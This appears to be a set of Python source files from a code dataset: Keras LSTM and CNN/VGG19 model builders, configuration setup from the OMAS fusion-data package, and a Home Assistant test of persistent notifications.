        :param decayed_dropout_start: stored but not read by this class
            (kept for API compatibility with sibling models)
        :param dropout_decay_steps: stored but not read by this class
        :param learning_rate: fixed Adam learning rate used by compile()
        :param decayed_lr_start: stored but not read by this class
        :param lr_decay_steps: stored but not read by this class
        :param seed: random seed (stored; not read by this class)
        """
        self._layer_width = layer_width
        self._time_step = time_step
        self._feat_size = feat_size
        self._dropout_rate = dropout_rate
        self._decayed_dropout_start = decayed_dropout_start
        self._dropout_decay_steps = dropout_decay_steps
        self._lr = learning_rate
        self._decayed_lr_start = decayed_lr_start
        self._lr_decay_steps = lr_decay_steps
        self._seed = seed
        self.model = None

    def getName(self):
        """Return the model name (the class name)."""
        return self.__class__.__name__

    def getModel(self):
        """Build the Keras model once and cache it in self.model."""
        if self.model is not None:
            return self.model
        print('{} constructing model {}'.format(strftime("%H:%M:%S"),
                                                self.getName()))
        feat = keras.Input(
            # A shape tuple (integers), not including the batch size.
            shape=(self._time_step, self._feat_size),
            # The name becomes a key in the dict.
            name='features',
            dtype='float32')
        seqlens = keras.Input(
            # must be a tuple: `shape=(1)` is just the integer 1
            shape=(1,),
            # The name becomes a key in the dict.
            name='seqlens',
            dtype='int32')
        inputs = {'features': feat, 'seqlens': seqlens}
        # RNN
        # choice for regularizer:
        # https://machinelearningmastery.com/use-weight-regularization-lstm-networks-time-series-forecasting/
        # L1 is to prune less important features, if we have a large feature set
        # https://towardsdatascience.com/l1-and-l2-regularization-methods-ce25e7fc831c
        units = self._layer_width
        layer = feat
        nlayer = 2
        for _ in range(nlayer):
            layer = keras.layers.LSTM(
                units=units,
                return_sequences=True,
                bias_initializer=tf.constant_initializer(0.1),
            )(layer)
            # halve the width for the next layer down the stack
            units = units // 2
        # extract last_relevant timestep
        layer = LastRelevant()((layer, seqlens))
        # FCN
        layer = keras.layers.Dense(
            units=units,
            bias_initializer=tf.constant_initializer(0.1),
            activation='selu')(layer)
        units = units // 2
        nlayer = 3
        for i in range(nlayer):
            if i == 0:
                # AlphaDropout preserves the self-normalizing property of selu
                layer = keras.layers.AlphaDropout(
                    rate=self._dropout_rate)(layer)
            layer = keras.layers.Dense(
                units=units,
                bias_initializer=tf.constant_initializer(0.1),
            )(layer)
            units = units // 2
        layer = keras.layers.Dense(
            units=units,
            bias_initializer=tf.constant_initializer(0.1),
            activation='selu')(layer)
        # Output layer: single linear unit for regression
        outputs = keras.layers.Dense(
            units=1,
            bias_initializer=tf.constant_initializer(0.1),
        )(layer)
        # pass the name through the public constructor argument instead of
        # assigning to the private Model._name attribute
        self.model = keras.Model(inputs=inputs, outputs=outputs,
                                 name=self.getName())
        return self.model

    def compile(self):
        """Compile the model with Adam + Huber loss and print its summary."""
        optimizer = tf.keras.optimizers.Adam(
            learning_rate=self._lr
        )
        self.model.compile(
            optimizer=optimizer,
            loss='huber_loss',
            # trying to fix 'Inputs to eager execution function cannot be Keras symbolic tensors'
            # ref: https://github.com/tensorflow/probability/issues/519
            experimental_run_tf_function=False)
        # summary() prints the table itself and returns None, so wrapping it
        # in print() would emit a spurious trailing "None"
        self.model.summary()
class LSTMRegressorV2:
    '''
    Bidirectional stacked-LSTM regressor built with the Keras functional API.

    Consumes a float32 `features` input of shape (batch, time_step,
    feat_size) and emits a single linear regression value per sample.
    Unlike V1 there is no `seqlens` input: the last bidirectional LSTM
    layer returns only its final output (return_sequences=False).
    '''

    def __init__(self,
                 layer_width=200,
                 num_lstm_layer=3,
                 num_fcn_layer=3,
                 time_step=30,
                 feat_size=3,
                 dropout_rate=0.5,
                 decayed_dropout_start=None,
                 dropout_decay_steps=None,
                 learning_rate=1e-3,
                 decayed_lr_start=None,
                 lr_decay_steps=None,
                 seed=None):
        """
        :param layer_width: units per LSTM direction and of the first dense layer
        :param num_lstm_layer: number of stacked bidirectional LSTM layers
        :param num_fcn_layer: number of dense layers in the head
        :param time_step: number of timesteps per input sequence
        :param feat_size: number of features per timestep
        :param dropout_rate: rate of the AlphaDropout layer after the LSTMs
        :param decayed_dropout_start: stored but not read by this class
        :param dropout_decay_steps: stored but not read by this class
        :param learning_rate: initial learning rate of the decay schedule
        :param decayed_lr_start: step at which LR decay starts (see compile())
        :param lr_decay_steps: first decay period of the LR schedule
        :param seed: random seed (stored; not read by this class)
        """
        self._layer_width = layer_width
        self._num_lstm_layer = num_lstm_layer
        self._num_fcn_layer = num_fcn_layer
        self._time_step = time_step
        self._feat_size = feat_size
        self._dropout_rate = dropout_rate
        self._decayed_dropout_start = decayed_dropout_start
        self._dropout_decay_steps = dropout_decay_steps
        self._lr = learning_rate
        self._decayed_lr_start = decayed_lr_start
        self._lr_decay_steps = lr_decay_steps
        self._seed = seed
        self.model = None

    def getName(self):
        """Return the model name (the class name)."""
        return self.__class__.__name__

    def getModel(self):
        """Build the Keras model once and cache it in self.model."""
        if self.model is not None:
            return self.model
        print('{} constructing model {}'.format(strftime("%H:%M:%S"),
                                                self.getName()))
        feat = keras.Input(
            # A shape tuple (integers), not including the batch size.
            shape=(self._time_step, self._feat_size),
            # The name becomes a key in the dict.
            name='features',
            dtype='float32')
        # RNN
        # choice for regularizer:
        # https://machinelearningmastery.com/use-weight-regularization-lstm-networks-time-series-forecasting/
        # L1 is to prune less important features, if we have a large feature set
        # https://towardsdatascience.com/l1-and-l2-regularization-methods-ce25e7fc831c
        layer = feat
        for i in range(self._num_lstm_layer):
            layer = keras.layers.Bidirectional(keras.layers.LSTM(
                units=self._layer_width,
                # only intermediate layers emit the full sequence; the last
                # layer returns just its final output
                return_sequences=i + 1 < self._num_lstm_layer,
                bias_initializer=tf.constant_initializer(0.1),
            ))(layer)
        # AlphaDropout preserves the self-normalizing property of selu
        layer = keras.layers.AlphaDropout(self._dropout_rate)(layer)
        # FCN head: dense layers with width halved at each step
        units = self._layer_width
        for i in range(self._num_fcn_layer):
            layer = keras.layers.Dense(
                units=units,
                bias_initializer=tf.constant_initializer(0.1),
                activation='selu'
            )(layer)
            units = units // 2
        # Output layer: single linear unit for regression
        outputs = keras.layers.Dense(
            units=1,
            bias_initializer=tf.constant_initializer(0.1),
        )(layer)
        # pass the name through the public constructor argument instead of
        # assigning to the private Model._name attribute
        self.model = keras.Model(inputs=feat, outputs=outputs,
                                 name=self.getName())
        return self.model

    def compile(self):
        """Compile with Adam on a delayed cosine-decay-restarts LR schedule."""
        decay_lr = DelayedCosineDecayRestarts(
            initial_learning_rate=self._lr,
            first_decay_steps=self._lr_decay_steps,
            decay_start=self._decayed_lr_start,
            t_mul=1.02,
            m_mul=0.95,
            alpha=0.095)
        optimizer = tf.keras.optimizers.Adam(
            learning_rate=decay_lr
        )
        self.model.compile(
            optimizer=optimizer,
            loss='huber_loss',
            # trying to fix 'Inputs to eager execution function cannot be Keras symbolic tensors'
            # ref: https://github.com/tensorflow/probability/issues/519
            experimental_run_tf_function=False,
            metrics=["mse", "mae"])
        # summary() prints the table itself and returns None, so wrapping it
        # in print() would emit a spurious trailing "None"
        self.model.summary()
11283913 | <reponame>gafusion/omas
'''pypi setup file
-------
'''
# --------------------------------------------
# external imports
# --------------------------------------------
import os
import sys
# single source of truth for the package version: the `version` file shipped
# next to this module
with open(os.path.abspath(str(os.path.dirname(__file__)) + os.sep + 'version'), 'r') as _f:
    __version__ = _f.read().strip()
# Add minor version revisions here
# This is done to keep track of changes between OMAS PYPI releases
# the if statements for these minor revisions can be deleted
# as the OMAS PYPI version increases
if __version__ == '0.66.0':
    __version__ += '.1'
# NOTE(review): the guard checks `< (3, 5)` but the message claims Python
# 3.6+ is required -- one of the two is wrong; confirm the real minimum.
if sys.version_info < (3, 5):
    raise Exception(
        '''
OMAS v%s only runs with Python 3.6+ and you are running Python %s
'''
        % (__version__, '.'.join(map(str, sys.version_info[:2])))
    )
import pwd
import glob
import json
import copy
from collections import OrderedDict
import re
import numpy
from pprint import pprint
from io import StringIO
from contextlib import contextmanager
import tempfile
import warnings
from functools import wraps
import ast
import base64
import traceback
import difflib
import weakref
import unittest
import itertools
try:
import tqdm
except ImportError:
tqdm = None
# monkey-patch warnings.formatwarning so that the offending source line is
# omitted from warning output (line='' drops it); keep the original around
formatwarning_orig = warnings.formatwarning
warnings.formatwarning = lambda message, category, filename, lineno, line=None: formatwarning_orig(
    message, category, filename, lineno, line=''
)
# pint: avoid loading pint upfront since it can be slow and it is not always used
# `ureg` is a single-element list used as a mutable holder; the `if False`
# branch deliberately disables the eager import (lazy loading elsewhere)
ureg = []
if False:
    import pint
    ureg.append(pint.UnitRegistry())
else:
    ureg.append(None)
# uncertainties
import uncertainties
import uncertainties.unumpy as unumpy
from uncertainties.unumpy import nominal_values, std_devs, uarray
from uncertainties import ufloat
# xarrays: avoid loading xarrays upfront since it can be slow and it is not always used
# import xarray
from collections.abc import MutableMapping
import pickle
def b2s(bytes):
    """Decode a UTF-8 encoded bytes object into a str."""
    return str(bytes, "utf-8")
# --------------------------------------------
# configuration of directories and IMAS infos
# --------------------------------------------
class IMAS_json_dir(str):
    """
    str subclass marking the directory where the JSON data structures
    for the different versions of IMAS are stored
    """
    pass
# directory of the omas package itself (with trailing separator)
omas_dir = os.path.abspath(str(os.path.dirname(__file__))) + os.sep
# parent of the package directory (the repository root in a source checkout)
omas_install_dir = os.path.abspath(omas_dir + os.sep + '..') + os.sep
# where the per-version IMAS JSON structure files live
imas_json_dir = IMAS_json_dir(omas_dir + os.sep + 'imas_structures' + os.sep)
# True when running from a writable git checkout (a `.git` folder exists and
# is writable) -- presumably gates developer-only behavior; check call sites
omas_git_repo = False
if os.path.exists(omas_install_dir + '.git') and os.access(omas_install_dir + '.git', os.W_OK):
    omas_git_repo = True
class IMAS_versions(OrderedDict):
    """
    Dictionary with list of IMAS version and their sub-folder name in the imas_json_dir

    Keys are dotted version strings (e.g. '3.28.0'), values are the
    corresponding folder names (e.g. '3_28_0').  Named branches (entries
    not starting with '3', such as `develop/3`) are listed before tagged
    versions.
    """

    def __init__(self, mode='all'):
        """
        :param mode: `all`, `named`, `tagged`
        """
        OrderedDict.__init__(self)
        # scan the structures folder once instead of re-globbing per mode
        basenames = [os.path.basename(x) for x in sorted(glob.glob(imas_json_dir + os.sep + '*'))]
        if mode in ['all', 'named']:
            # first `develop/3` and other branches
            for _item in basenames:
                if not _item.startswith('3'):
                    self[_item.replace('_', '.')] = _item
        if mode in ['all', 'tagged']:
            # next all tagged versions sorted by version number
            for _item in basenames:
                if _item.startswith('3'):
                    self[_item.replace('_', '.')] = _item
        # do not include empty imas_structures directories (eg. needed to avoid issues wheen switching to old git branches)
        for item, value in list(self.items()):
            if not len(glob.glob(imas_json_dir + os.sep + value + os.sep + '*.json')):
                del self[item]
# imas versions
imas_versions = IMAS_versions()
# most recent available version, or a placeholder when no structures are bundled
if len(list(imas_versions.keys())):
    latest_imas_version = list(imas_versions.keys())[-1]
else:
    latest_imas_version = '0.0.0'
# the default IMAS version can be overridden via the OMAS_IMAS_VERSION
# environment variable; otherwise it is the latest available version
# (same fallback as latest_imas_version, so reuse it instead of recomputing)
_default_imas_version = os.environ.get('OMAS_IMAS_VERSION', latest_imas_version)
# --------------------------------------------
# rcparams
# --------------------------------------------
class OMAS_rc_params(dict):
    """
    dictionary of parameters that control how OMAS operates

    (plain dict subclass used as a distinct type marker; populated at
    import time into the module-level `omas_rcparams` singleton)
    """
    pass
# module-level singleton holding the runtime configuration defaults;
# several entries can be overridden through environment variables
omas_rcparams = OMAS_rc_params()
omas_rcparams.update(
    {
        # COCOS coordinate-convention number used by OMAS internally
        'cocos': 11,
        # validate data against the IMAS schema on assignment
        'consistency_check': True,
        # automatically create intermediate nodes when assigning deep paths
        'dynamic_path_creation': True,
        # scratch directory (per-user), overridable via OMAS_TMP_DIR
        'tmp_omas_dir': os.environ.get(
            'OMAS_TMP_DIR', os.sep.join([tempfile.gettempdir(), os.environ.get('USER', 'dummy_user'), 'OMAS_TMP_DIR'])
        ),
        # storage location used when emulating IMAS, overridable via OMAS_FAKE_IMAS_DIR
        'fake_imas_dir': os.environ.get(
            'OMAS_FAKE_IMAS_DIR', os.sep.join([os.environ.get('HOME', tempfile.gettempdir()), 'tmp', 'OMAS_FAKE_IMAS_DIR'])
        ),
        # whether falling back to the fake IMAS implementation is permitted
        'allow_fake_imas_fallback': bool(int(os.environ.get('OMAS_ALLOW_FAKE_IMAS_FALLBACK', '0'))),
        # IMAS data-dictionary version to use when none is specified
        'default_imas_version': _default_imas_version,
        # template URI; {user}/{pass} are literal placeholders filled in later
        'default_mongo_server': 'mongodb+srv://{user}:{pass}@omasdb-xymmt.mongodb.net',
        # pickle protocol used for serialization (4 keeps py3.4+ compatibility)
        'pickle_protocol': 4,
    }
)
@contextmanager
def rcparams_environment(**kw):
    """
    Context manager to temporarily override entries of `omas_rcparams`.

    On exit the original parameters are restored exactly: the dict is
    cleared before re-applying the saved copy, so keys that were newly
    introduced via `kw` are removed as well (a plain `update(old)` would
    have left them behind).
    """
    old_omas_rcparams = omas_rcparams.copy()
    omas_rcparams.update(kw)
    try:
        yield omas_rcparams
    finally:
        # drop any keys added inside the context, then restore old values
        omas_rcparams.clear()
        omas_rcparams.update(old_omas_rcparams)
# --------------------------------------------
# additional data structures
# --------------------------------------------
# registry of extra (non-IMAS) data-structure definitions; populated elsewhere
add_datastructures = {}
def omas_testdir(filename_topic=''):
    """
    Return path to temporary folder where OMAS TEST file are saved/loaded

    NOTE: If directory does not exists it is created

    :param filename_topic: optional file path (typically a test file);
        its basename without extension becomes a sub-folder

    :return: string with path to OMAS TEST folder (with trailing slash)
    """
    if filename_topic:
        filename_topic = os.path.splitext(os.path.split(filename_topic)[-1])[0] + '/'
    tmp = tempfile.gettempdir() + '/OMAS_TESTS/' + filename_topic
    # exist_ok avoids the exists()/makedirs() race when tests run concurrently
    os.makedirs(tmp, exist_ok=True)
    return tmp
| StarcoderdataPython |
4814504 | from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Flatten, Activation, MaxPooling2D, Conv2D
from keras import optimizers
from keras import regularizers
from keras import applications
def model(img_size, num_class):
    """
    Build and compile a small 3-block CNN classifier trained from scratch.

    :param img_size: height/width of the (square) RGB input images
    :param num_class: number of output classes
    :return: compiled Keras Sequential model (softmax output,
        categorical cross-entropy loss)
    """
    model = Sequential()
    # block 1: 32 filters -> relu -> 2x2 max-pool
    model.add(Conv2D(32, (3, 3), input_shape=(img_size, img_size, 3)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # block 2: 64 filters
    model.add(Conv2D(64, (3, 3)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # block 3: 128 filters
    model.add(Conv2D(128, (3, 3)))
    model.add(Activation('relu'))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # classifier head: L2-regularized dense layer + dropout
    model.add(Flatten())
    model.add(Dense(500, kernel_regularizer=regularizers.l2(0.01)))
    model.add(Activation('relu'))
    model.add(Dropout(0.5))
    model.add(Dense(num_class))
    model.add(Activation('softmax'))
    # use the canonical class name; lowercase `optimizers.adam` is only a
    # legacy alias and does not exist in newer Keras releases
    adam = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999)
    model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy'])
    return model
def tf_model(img_size, num_class):
    """
    Build a transfer-learning classifier: frozen VGG19 base + dense head.

    :param img_size: height/width of the (square) RGB input images
    :param num_class: number of output classes
    :return: compiled Keras functional Model (softmax output,
        categorical cross-entropy loss)
    """
    model = applications.VGG19(weights="imagenet", include_top=False, input_shape=(img_size, img_size, 3))
    # Freeze the layers which you don't want to train. Here I am freezing all layers.
    for layer in model.layers:
        layer.trainable = False
    # Adding custom Layers
    x = model.output
    x = Flatten()(x)
    x = Dense(1024, activation="relu")(x)
    x = Dropout(0.5)(x)
    x = Dense(1024, activation="relu")(x)
    predictions = Dense(num_class, activation="softmax")(x)
    # creating the final model; the singular `input=`/`output=` keyword
    # arguments were removed from Keras -- `inputs=`/`outputs=` is the
    # supported spelling
    model_final = Model(inputs=model.input, outputs=predictions)
    # canonical class name instead of the legacy lowercase `adam` alias
    adam = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999)
    # compile the model
    model_final.compile(loss="categorical_crossentropy", optimizer=adam, metrics=["accuracy"])
    return model_final
| StarcoderdataPython |
310690 | """The tests for the notify.persistent_notification service."""
from homeassistant.components import notify
import homeassistant.components.persistent_notification as pn
from homeassistant.core import HomeAssistant
from homeassistant.setup import async_setup_component
async def test_async_send_message(hass: HomeAssistant):
    """Test sending a message to notify.persistent_notification service."""
    # set up both the persistent_notification and notify integrations
    await async_setup_component(hass, pn.DOMAIN, {"core": {}})
    await async_setup_component(hass, notify.DOMAIN, {})
    await hass.async_block_till_done()
    # fire the notify.persistent_notification service with message + title
    message = {"message": "Hello", "title": "Test notification"}
    await hass.services.async_call(
        notify.DOMAIN, notify.SERVICE_PERSISTENT_NOTIFICATION, message
    )
    # wait until the service call has been fully processed
    await hass.async_block_till_done()
    # exactly one notification entity should have been created
    entity_ids = hass.states.async_entity_ids(pn.DOMAIN)
    assert len(entity_ids) == 1
    # its state attributes carry the message and title that were sent
    state = hass.states.get(entity_ids[0])
    assert state.attributes.get("message") == "Hello"
    assert state.attributes.get("title") == "Test notification"
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.